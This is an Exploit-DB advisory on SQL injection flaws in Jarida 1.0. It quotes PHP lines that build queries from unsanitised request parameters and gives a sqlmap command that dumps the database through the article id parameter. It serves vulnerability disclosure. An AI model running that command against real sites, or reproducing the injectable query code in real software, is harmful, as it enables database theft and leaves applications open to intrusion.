Jarida 1.0 - Multiple Vulnerabilities

EDB-ID:

17895

CVE:





Platform:

PHP

Date:

2011-09-27


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title:   Jarida 1.0 SQL Injection
# Date         :   26 September 2011
# Author       :   Ptrace Security (Gianni Gnesa [gnix])
# Contact      :   research[at]ptrace-security[dot]com
# Software Link:   http://sourceforge.net/projects/jarida/
# Version      :   1.0
# Tested on    :   CentOS 5.6
 
 
[01] ./article.php:28:  $query = "SELECT article_id FROM tblArticle WHERE article_id = " . $_GET['id'];
     => ./sqlmap.py -u http://192.168.109.111/jarida_1.0/article.php?id=1 --dump --tables


[02] ./comment.php

     36 $name = $_POST['name'];
     37 $web = $_POST['web'];
     38 $title = $_POST['title'];
     39 $body = $_POST['body'];
     40 $ip = $_SERVER['REMOTE_ADDR'];
     41 $article_id = $_POST['id'];
     42 $date = time();
     43 
     ...
     56 
     57 switch($_POST['type'])
     58 {
     59  case 'article':
     60    $redirect_url = "./article.php?id=" . $_POST['id'];
     61    $query = "INSERT INTO tblArticleComment (comment_article_id, comment_title, comment_date, comment_body, comment_name, comment_web, comment_ip)
     62                 VALUES('$article_id', '$title', '$date', '$body', '$name', '$web', '$ip')";
     63    break;
     64 
     65  case 'photo':
     66    $redirect_url = "./photo.php?id=" . $_POST['id'];
     67    $query = "INSERT INTO tblPhotoComment (comment_photo_id, comment_title, comment_date, comment_body, comment_name, comment_web, comment_ip)
     68                 VALUES('$article_id', '$title', '$date', '$body', '$name', '$web', '$ip')";
     69    break;
     70 }


[03] ./photo.php

     39   $query = "SELECT photo_id FROM tblPhoto
     40                  WHERE photo_id = " . $_GET['id'];